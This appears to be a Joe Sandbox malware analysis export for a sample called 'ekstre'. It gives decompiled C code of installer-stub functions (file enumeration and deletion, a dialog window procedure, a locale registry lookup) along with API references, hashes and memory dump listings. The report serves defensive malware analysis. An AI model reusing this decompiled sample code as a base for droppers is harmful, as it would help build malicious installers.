0x00405b9d
0x00405b9f
0x00000000
0x00405bba
0x00405ba1
0x00405ba4
0x00000000
0x00000000
0x00405ba9
0x00000000
0x00405bb0
0x00405b79
0x00405b79
0x00000000
0x00405b79
0x00405a46
0x00405a49
0x00000000
0x00000000
0x00000000
0x00405a49

APIs

DeleteFileA.KERNELBASE(?,?,76E73410,007F9000,007EF000), ref: 00405A1F
lstrcatA.KERNEL32(007B8D70,\*.*,007B8D70,?,?,76E73410,007F9000,007EF000), ref: 00405A67
lstrcatA.KERNEL32(?,0040A014,?,007B8D70,?,?,76E73410,007F9000,007EF000), ref: 00405A88
lstrlenA.KERNEL32(?,?,0040A014,?,007B8D70,?,?,76E73410,007F9000,007EF000), ref: 00405A8E
FindFirstFileA.KERNEL32(007B8D70,?,?,?,0040A014,?,007B8D70,?,?,76E73410,007F9000,007EF000), ref: 00405A9F
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B4C
FindClose.KERNEL32(00000000), ref: 00405B5D

Strings

\*.*, xrefs: 00405A61

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f187945a33a59780f92038aef4cf18092c6916ac965ca52c38bbad9a6938d9ee
Instruction ID: 03867de1bd77193f5eab859ec40b91607e691646dec6b867c739c05e4d204d7f
Opcode Fuzzy Hash: f187945a33a59780f92038aef4cf18092c6916ac965ca52c38bbad9a6938d9ee
Instruction Fuzzy Hash: EC519F30900A04AADB21AB658C85FBFBB78DF42714F14817FF841711D2D77CA982DE6A

Uniqueness

Uniqueness Score: -1.00%

Function 004065AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004065AB(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7bcdb8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7bcdb8;
			}

0x004065b6
0x004065bf
0x00000000
0x004065cc
0x004065c2
0x00000000

APIs

FindFirstFileA.KERNELBASE(76E73410,007BCDB8,C:\,00405CF7,C:\,C:\,00000000,C:\,C:\,76E73410,?,007F9000,00405A16,?,76E73410,007F9000), ref: 004065B6
FindClose.KERNEL32(00000000), ref: 004065C2

Strings

C:\, xrefs: 004065AB

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 2cbbcc60af0a07a4aa122aa628e3236b83e54112973455129ffddd3d5d7ba52e
Instruction ID: 71d932cc678cbcb0752b011ce04051371fbeda5ac102800fcd170b0a5c136554
Opcode Fuzzy Hash: 2cbbcc60af0a07a4aa122aa628e3236b83e54112973455129ffddd3d5d7ba52e
Instruction Fuzzy Hash: 81D01235624120BFC3416B38BD0C88B7E989F193313218E36F46AF12E4C6348C2686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00403DB7 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403DB7(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				struct HWND__* _t46;
				signed int _t65;
				struct HWND__* _t71;
				signed int _t84;
				struct HWND__* _t89;
				signed int _t97;
				int _t101;
				signed int _t115;
				int _t116;
				int _t120;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				intOrPtr _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;

				_t128 = _a8;
				if(_t128 == 0x110 || _t128 == 0x408) {
					_t32 = _a12;
					_t125 = _a4;
					__eflags = _t128 - 0x110;
					 *0x7b0d50 = _t32;
					if(_t128 == 0x110) {
						 *0x7c5f68 = _t125;
						 *0x7b0d64 = GetDlgItem(_t125, 1);
						_t89 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push("true");
						 *0x7a8d30 = _t89;
						E004042B1(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7c1f48);
						 *0x7c1f2c = E0040140B(4);
						_t32 = 1;
						__eflags = 1;
						 *0x7b0d50 = 1;
					}
					_t122 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t122 << 6) +  *0x7c5f80;
					__eflags = _t122;
					if(_t122 < 0) {
						L36:
						E004042FD(0x40b);
						while(1) {
							_t34 =  *0x7b0d50;
							 *0x40a1dc =  *0x40a1dc + _t34;
							_t131 = _t131 + (_t34 << 6);
							_t36 =  *0x40a1dc; // 0x0
							__eflags = _t36 -  *0x7c5f84;
							if(_t36 ==  *0x7c5f84) {
								E0040140B(1);
							}
							__eflags =  *0x7c1f2c - _t134;
							if( *0x7c1f2c != _t134) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x7c5f84; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t131 + 0x14);
							E004062C7(_t115, _t125, _t131, 0x803000,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042B1(_t125);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042B1(_t125);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042B1(_t125);
							_t46 = GetDlgItem(_t125, 3);
							__eflags =  *0x7c5fec - _t134;
							_v28 = _t46;
							if( *0x7c5fec != _t134) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t46, _t115 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
							E004042D3(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x7a8d30, _t116);
							__eflags = _t116 - _t134;
							if(_t116 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
							__eflags =  *0x7c5fec - _t134;
							if( *0x7c5fec == _t134) {
								_push( *0x7b0d64);
							} else {
								SendMessageA(_t125, 0x401, 2, _t134);
								_push( *0x7a8d30);
							}
							E004042E6();
							E00406234(0x7b0d68, E00403D98());
							E004062C7(0x7b0d68, _t125, _t131,  &(0x7b0d68[lstrlenA(0x7b0d68)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t125, 0x7b0d68); // executed
							_push(_t134);
							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x7c1f38); // executed
									 *0x7acd40 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L60;
									}
									_t71 = CreateDialogParamA( *0x7c5f60,  *_t131 +  *0x7c1f40 & 0x0000ffff, _t125,  *(0x40a1e0 +  *(_t131 + 4) * 4), _t131); // executed
									__eflags = _t71 - _t134;
									 *0x7c1f38 = _t71;
									if(_t71 == _t134) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042B1(_t71);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t125, _t135 + 0x10);
									SetWindowPos( *0x7c1f38, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x7c1f2c - _t134;
									if( *0x7c1f2c != _t134) {
										goto L63;
									}
									ShowWindow( *0x7c1f38, 8); // executed
									E004042FD(0x405);
									goto L60;
								}
								__eflags =  *0x7c5fec - _t134;
								if( *0x7c5fec != _t134) {
									goto L63;
								}
								__eflags =  *0x7c5fe0 - _t134;
								if( *0x7c5fe0 != _t134) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x7c1f38);
						 *0x7c5f68 = _t134;
						EndDialog(_t125,  *0x7aad38);
						goto L60;
					} else {
						__eflags = _t32 - 1;
						if(_t32 != 1) {
							L35:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						SendMessageA( *0x7c1f38, 0x40f, 0, 1);
						__eflags =  *0x7c1f2c;
						return 0 |  *0x7c1f2c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t134 = 0;
					if(_t128 == 0x47) {
						SetWindowPos( *0x7b0d48, _t125, 0, 0, 0, 0, 0x13);
					}
					_t120 = _a12;
					if(_t128 != 5) {
						L8:
						if(_t128 != 0x40d) {
							__eflags = _t128 - 0x11;
							if(_t128 != 0x11) {
								__eflags = _t128 - 0x111;
								if(_t128 != 0x111) {
									goto L28;
								}
								_t133 = _t120 & 0x0000ffff;
								_t126 = GetDlgItem(_t125, _t133);
								__eflags = _t126 - _t134;
								if(_t126 == _t134) {
									L15:
									__eflags = _t133 - 1;
									if(_t133 != 1) {
										__eflags = _t133 - 3;
										if(_t133 != 3) {
											_t127 = 2;
											__eflags = _t133 - _t127;
											if(_t133 != _t127) {
												L27:
												SendMessageA( *0x7c1f38, 0x111, _t120, _a16);
												goto L28;
											}
											__eflags =  *0x7c5fec - _t134;
											if( *0x7c5fec == _t134) {
												_t97 = E0040140B(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L28;
												}
												 *0x7aad38 = 1;
												L23:
												_push(0x78);
												L24:
												E0040428A();
												goto L28;
											}
											E0040140B(_t127);
											 *0x7aad38 = _t127;
											goto L23;
										}
										__eflags =  *0x40a1dc - _t134; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t133);
									goto L24;
								}
								SendMessageA(_t126, 0xf3, _t134, _t134);
								_t101 = IsWindowEnabled(_t126);
								__eflags = _t101;
								if(_t101 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongA(_t125, _t134, _t134);
							return 1;
						}
						DestroyWindow( *0x7c1f38);
						 *0x7c1f38 = _t120;
						L60:
						if( *0x7b8d68 == _t134 &&  *0x7c1f38 != _t134) {
							ShowWindow(_t125, 0xa); // executed
							 *0x7b8d68 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x7b0d48,  ~(_t120 - 1) & 0x00000005);
						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404318(_a8, _t120, _a16);
						} else {
							ShowWindow(_t125, 4);
							goto L8;
						}
					}
				}
			}

0x00403dc2
0x00403dc9
0x00403f30
0x00403f34
0x00403f38
0x00403f3a
0x00403f3f
0x00403f4a
0x00403f55
0x00403f5a
0x00403f5c
0x00403f5e
0x00403f61
0x00403f66
0x00403f74
0x00403f81
0x00403f88
0x00403f88
0x00403f89
0x00403f89
0x00403f8e
0x00403f94
0x00403f9b
0x00403fa1
0x00403fa3
0x00403fe3
0x00403fe8
0x00403fed
0x00403fed
0x00403ff2
0x00403ffb
0x00403ffd
0x00404002
0x00404008
0x0040400c
0x0040400c
0x00404011
0x00404017
0x00000000
0x00000000
0x00404022
0x00404028
0x00000000
0x00000000
0x00404031
0x00404039
0x0040403e
0x00404041
0x00404047
0x0040404c
0x0040404f
0x00404055
0x0040405a
0x0040405d
0x00404063
0x0040406b
0x00404071
0x00404077
0x0040407b
0x00404082
0x00404082
0x00404082
0x0040408c
0x0040409e
0x004040aa
0x004040af
0x004040b9
0x004040bf
0x004040c1
0x004040c6
0x004040c3
0x004040c3
0x004040c3
0x004040d6
0x004040ee
0x004040f0
0x004040f6
0x0040410b
0x004040f8
0x00404101
0x00404103
0x00404103
0x00404111
0x00404122
0x00404133
0x0040413a
0x00404140
0x00404144
0x00404149
0x0040414b
0x00000000
0x00404151
0x00404151
0x00404153
0x00000000
0x00000000
0x00404159
0x0040415d
0x00404182
0x00404188
0x0040418e
0x00404190
0x00000000
0x00000000
0x004041b6
0x004041bc
0x004041be
0x004041c3
0x00000000
0x00000000
0x004041c9
0x004041cc
0x004041cf
0x004041e6
0x004041f2
0x0040420b
0x00404211
0x00404215
0x0040421a
0x00404220
0x00000000
0x00000000
0x0040422a
0x00404235
0x00000000
0x00404235
0x0040415f
0x00404165
0x00000000
0x00000000
0x0040416b
0x00404171
0x00000000
0x00000000
0x00000000
0x00404177
0x0040414b
0x00404242
0x0040424e
0x00404255
0x00000000
0x00403fa5
0x00403fa5
0x00403fa8
0x00403fdb
0x00403fdb
0x00403fdd
0x00000000
0x00000000
0x00000000
0x00403fdd
0x00403faa
0x00403fae
0x00403fb3
0x00403fb5
0x00000000
0x00000000
0x00403fc5
0x00403fcd
0x00000000
0x00403fd3
0x00403ddb
0x00403ddb
0x00403ddf
0x00403de4
0x00403df3
0x00403df3
0x00403df9
0x00403e00
0x00403e44
0x00403e4a
0x00403e63
0x00403e66
0x00403e79
0x00403e7f
0x00000000
0x00000000
0x00403e85
0x00403e90
0x00403e92
0x00403e94
0x00403eb3
0x00403eb3
0x00403eb6
0x00403ebb
0x00403ebe
0x00403ece
0x00403ecf
0x00403ed1
0x00403f07
0x00403f17
0x00000000
0x00403f17
0x00403ed3
0x00403ed9
0x00403ef2
0x00403ef7
0x00403ef9
0x00000000
0x00000000
0x00403efb
0x00403ee7
0x00403ee7
0x00403ee9
0x00403ee9
0x00000000
0x00403ee9
0x00403edc
0x00403ee1
0x00000000
0x00403ee1
0x00403ec0
0x00403ec6
0x00000000
0x00000000
0x00403ec8
0x00000000
0x00403ec8
0x00403eb8
0x00000000
0x00403eb8
0x00403e9e
0x00403ea5
0x00403eab
0x00403ead
0x0040427e
0x00000000
0x0040427e
0x00000000
0x00403ead
0x00403e6b
0x00000000
0x00403e73
0x00403e52
0x00403e58
0x0040425b
0x00404261
0x0040426e
0x00404274
0x00404274
0x00000000
0x00403e02
0x00403e07
0x00403e13
0x00403e1c
0x00403f1d
0x00000000
0x00403e3b
0x00403e3e
0x00000000
0x00403e3e
0x00403e1c
0x00403e00

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DF3
ShowWindow.USER32(?), ref: 00403E13
GetWindowLongA.USER32(?,000000F0), ref: 00403E25
ShowWindow.USER32(?,00000004), ref: 00403E3E
DestroyWindow.USER32 ref: 00403E52
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E6B
GetDlgItem.USER32(?,?), ref: 00403E8A
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403E9E
IsWindowEnabled.USER32(00000000), ref: 00403EA5
GetDlgItem.USER32(?,00000001), ref: 00403F50
GetDlgItem.USER32(?,00000002), ref: 00403F5A
SetClassLongA.USER32(?,000000F2,?), ref: 00403F74
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FC5
GetDlgItem.USER32(?,00000003), ref: 0040406B
ShowWindow.USER32(00000000,?), ref: 0040408C
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040409E
EnableWindow.USER32(?,?), ref: 004040B9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040CF
EnableMenuItem.USER32(00000000), ref: 004040D6
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 004040EE
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404101
lstrlenA.KERNEL32(007B0D68,?,007B0D68,00000000), ref: 0040412B
SetWindowTextA.USER32(?,007B0D68), ref: 0040413A
ShowWindow.USER32(?,0000000A), ref: 0040426E

Strings

h{, xrefs: 0040411B

Memory Dump Source

Source File: 00000000.00000002.1117513142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1117477265.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117579894.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.000000000078D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007BD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000007F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1117622927.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1119767205.00000000008BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: h{
API String ID: 121052019-3422328179
Opcode ID: 96c77e2977b2a2e3ab2eb893d7c86a559a069cba97f39a8a57f8b62ad1ad108f
Instruction ID: 91984cc6b4a8bca22775a4f92fae0fb1e6d0ad204803f9428d1e19e59115a5aa
Opcode Fuzzy Hash: 96c77e2977b2a2e3ab2eb893d7c86a559a069cba97f39a8a57f8b62ad1ad108f
Instruction Fuzzy Hash: 09C1DEB1A00604ABCB206F61ED85E2B3B78EB86345F00467EF641B51F1CB3D9851DB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403A1A Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403A1A(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				signed short _t67;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x7c5f70;
				_t17 = E00406640(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x7b0d68;
					 *0x7f7000 = 0x30;
					 *0x7f7001 = 0x78;
					 *0x7f7002 = 0;
					E0040611B(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x7b0d68, 0);
					__eflags =  *0x7b0d68;
					if(__eflags == 0) {
						E0040611B(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x7b0d68, 0);
					}
					lstrcatA(0x7f7000, _t74);
				} else {
					_t67 =  *_t17(); // executed
					E00406192(0x7f7000, _t67 & 0x0000ffff);
				}
				E00403CDF(_t71, _t84);
				 *0x7c5fe0 =  *0x7c5f78 & 0x00000020;
				 *0x7c5ffc = 0x10000;
				if(E00405CB4(_t84, 0x7f1000) != 0) {
					L16:
					if(E00405CB4(_t92, 0x7f1000) == 0) {
						E004062C7(0, _t74, _t76, 0x7f1000,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x7c5f60, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7c1f48 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403CDF(_t71, __eflags);
							__eflags =  *0x7c6000;
							if( *0x7c6000 != 0) {
								_t28 = E00405427(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7c1f2c;
								if( *0x7c1f2c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7b0d48, 5); // executed
							_t34 = E004065D2("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065D2("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x7c1f00);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7c1f00);
								 *0x7c1f24 = _t81;
								RegisterClassA(0x7c1f00);
							}
							_t39 = DialogBoxParamA( *0x7c5f60,  *0x7c1f40 + 0x00000069 & 0x0000ffff, 0, E00403DB7, 0); // executed
							E0040396A(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x7c5f60;
						 *0x7c1f04 = 0x401000;
						 *0x7c1f10 =  *0x7c5f60;
						 *0x7c1f14 = _t25;
						 *0x7c1f24 = 0x40a1f4;
						if(RegisterClassA(0x7c1f00) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x7b0d48 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7c5f60, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x7bdf00;
					E0040611B(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x7c5f98, 0x7bdf00, 0);
					_t57 =  *0x7bdf00; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x7bdf01;
						 *((char*)(E00405BF1(0x7bdf01, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406234(0x7f1000, E00405BC6(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C0D(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a20
0x00403a29
0x00403a30
0x00403a32
0x00403a46
0x00403a58
0x00403a5f
0x00403a66
0x00403a6c
0x00403a71
0x00403a77
0x00403a8a
0x00403a8a
0x00403a95
0x00403a34
0x00403a34
0x00403a3f
0x00403a3f
0x00403a9a
0x00403aad
0x00403ab2
0x00403ac3
0x00403b4a
0x00403b52
0x00403b5b
0x00403b5b
0x00403b71
0x00403b77
0x00403b85
0x00403c06
0x00403c0e
0x00403c18
0x00403c1d
0x00403c23
0x00403cad
0x00403cb2
0x00403cb4
0x00403cd0
0x00000000
0x00403cd0
0x00403cb6
0x00403cbc
0x00403cc4
0x00403cc4
0x00000000
0x00403cbc
0x00403c31
0x00403c3c
0x00403c41
0x00403c43
0x00403c4a
0x00403c4a
0x00403c55
0x00403c5d
0x00403c5f
0x00403c61
0x00403c6a
0x00403c6d
0x00403c73
0x00403c73
0x00403c92
0x00403ca3
0x00000000
0x00403ca8
0x00403c10
0x00403c12
0x00000000
0x00403b87
0x00403b87
0x00403b93
0x00403b9d
0x00403ba3
0x00403ba8
0x00403bb7
0x00403cd5
0x00403cd5
0x00000000
0x00403cd5
0x00403bc6
0x00403c01
0x00000000
0x00403c01
0x00403ac9
0x00403ac9
0x00403acc
0x00403ace
0x00000000
0x00000000
0x00403ad8
0x00403ae8
0x00403aed
0x00403af4
0x00000000
0x00000000
0x00403af8
0x00403afa
0x00403b07
0x00403b07
0x00403b0f
0x00403b15
0x00403b3d
0x00403b45
0x00000000
0x00403b27
0x00403b28
0x00403b31
0x00403b37
0x00403b38
0x00000000
0x00403b38
0x00403b33
0x00403b35
0x00000000
0x00000000
0x00000000
0x00403b35
0x00403b15

APIs

Part of subcall function 00406640: GetModuleHandleA.KERNEL32(?,00000000,?,004034D2,0000000B), ref: 00406652
Part of subcall function 00406640: GetProcAddress.KERNEL32(00000000,?), ref: 0040666D

GetUserDefaultUILanguage.KERNELBASE(00000002,76E73410,007F9000,?,007EF000,00000009,0000000B), ref: 00403A34

Part of subcall function 00406192: wsprintfA.USER32 ref: 0040619F

lstrcatA.KERNEL32(007F7000,007B0D68,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B0D68,00000000,00000002,76E73410,007F9000,?,007EF000,00000009,0000000B), ref: 00403A95
lstrlenA.KERNEL32(007BDF00,?,?,?,007BDF00,00000000,007F1000,007F7000,007B0D68,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B0D68,00000000,00000002,76E73410), ref: 00403B0A
lstrcmpiA.KERNEL32(?,.exe), ref: 00403B1D
